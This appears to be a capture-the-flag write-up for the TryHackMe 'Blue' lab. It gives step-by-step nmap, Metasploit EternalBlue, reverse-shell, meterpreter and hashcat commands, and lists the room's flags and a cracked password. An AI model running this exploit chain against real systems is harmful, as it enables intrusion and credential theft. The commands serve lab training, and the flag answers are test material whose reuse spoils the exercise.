TryHackMe: Blue write up
--
Hope you are doing well, so lets get started with the Blue machine on TryHackme.
before we start the machine lets make sure we are connected to the TryHackeMe VPN. to do so head over to the link and download the configuration file. Once the file is downloaded, head over to the terminal and connect using openvpn as follows:
sudo openvpn vpnfile.ovpn
Once we are connected, we can proceed with the tasks
Task 1
First we start the machine.
To scan the machine we run the following nmap command
nmap -sV -vv — script vuln TARGET_IP
we see that the following ports are open
135.139,445,3389,49152,49153,49154,49158,49159
As we can see there are 3 ports open under 1000
in the nmap ouput we see that the machine is vulnerable to ms17–010
smb-vuln-ms17–010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17–010)
| State: VULNERABLE
| IDs: CVE:CVE-2017–0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17–010).
|
| Disclosure date: 2017–03–14
Task 2
We start metasploit with the command
msfconsole
we search the metasploit data base by searching for ms17_010
msf6 > search ms17–101
metasploit returns the name of the exploit
exploit/windows/smb/ms17_010_eternalblue
in order to use the exploit, select the exploit by running the command by running use <number> , number here is the number of the exploit
msf6 > use 0
once we have the exploit selected, we can display the options by running
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
now we have to set the rhosts
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.90.60
to set the payload we run
since we are accessing the machine over vpn we have to also set the lhost
to do so run the following command
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost tun0
to set the payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
once all options are set we execute the exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
after some time you should have a shell. If the exploit fails stop all jobs by executing
msf6 exploit(windows/smb/ms17_010_eternalblue) > jobs -K
and now try running the exploit again. If the exploit fails again, try rebooting the target machine and change the rhosts value to the new ip address
once you have the shell, we can background this shell by running background and then y, now to upgrade the shell to meterpreter shell we can use the exploit
Task 3
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter
to use this exploit we set the session as follows
set session 2
and then
run
After trying multiple time i was not able to get a meterpreter shell and the only solution was to use the windows/smb/ms17_010_eternalblue without setting the payload
as we can see we have got a meterpreter shell
to list all process we run
ps
we note down the process id where user is NT AUTHORITY\SYSTEM
its best to use winlogon.exe as it will have most of the permissions
Task 4
once we have migrated to another process we can run the following
now we can crack the hash using hashcat, to do this we copy the hashes and store it in a file
to run hashcat we have
hashcat -m 1000 hashes /usr/share/wordlists/rockyou.txt
once the hash is cracked we can see the password with
hashcat -m 1000 hashes /usr/share/wordlists/rockyou.txt — show
we see that the password is alqfna22
Task 5
we can see that the first flag is at location C:\
flag 1 flag{access_the_machine}
to find flag we head over to the configuration file where hashes of passsword are stored
flag 2 flag{sam_database_elevated_access}
to find flag 3 we head over to Jons Document folder
flag 3 flag{admin_documents_can_be_valuable}
